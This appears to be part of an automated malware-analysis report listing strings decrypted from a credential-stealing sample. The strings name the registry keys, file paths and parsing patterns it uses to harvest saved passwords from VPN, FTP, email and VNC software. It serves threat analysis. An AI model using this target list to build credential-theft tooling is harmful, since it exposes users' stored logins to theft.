                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: global
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account.
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account.
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: name
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Psi\profiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Psi+\profiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: OpenVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: auth-data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: entropy
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: USERPROFILE
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \OpenVPN\config\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: remote
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: remote
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVpn.exe*
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: user.config
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: //setting[@name='Username']/value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: //setting[@name='Password']/value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: %ProgramW6432%
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access\data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Private Internet Access\data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \account.json
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: .*"username":"(.*?)"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: .*"password":"(.*?)"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: privateinternetaccess.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FileZilla
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Server>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: CoreFTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: User
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Port
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: hdfzpysvpzimorhk
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HostName
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UserName
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PublicKeyFile
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PortNumber
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ABCDEF
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Flash FXP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: port
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: user
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: quick.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Sites.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTP Navigator
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: No Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: User
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmartFTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WS_FTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HOST
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FtpCommander
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \cftp\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Server=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Anonymous=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FTPGetter\servers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: The Bat!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \The Bat!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: DataDir
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Folder.lst
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Mailbox.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PassWd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Outlook
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Mail App
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: syncpassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: mailoutgoing
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FoxMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Executable
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FoxmailPath
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPHost
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IncomingServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Opera Mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: opera:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PocoMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Pocomail\accounts.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POPPass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPPass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client\accounts.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "Username":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "Secret":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "ProviderName":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: o6806642kbM7c5
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SenderIdentities
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Mailbird\Store\Store.db
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server_Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: EncryptedPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\ORL\WinVNC3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: TightVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Software\TightVNC\Server
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Password
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: TightVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Software\TightVNC\Server
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: PasswordViewOnly
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: TightVNC ControlPassword
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Software\TightVNC\Server
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ControlPassword
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: TigerVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Software\TigerVNC\Server
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Password
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles(x86)
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles(x86)
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd2
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd2
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles
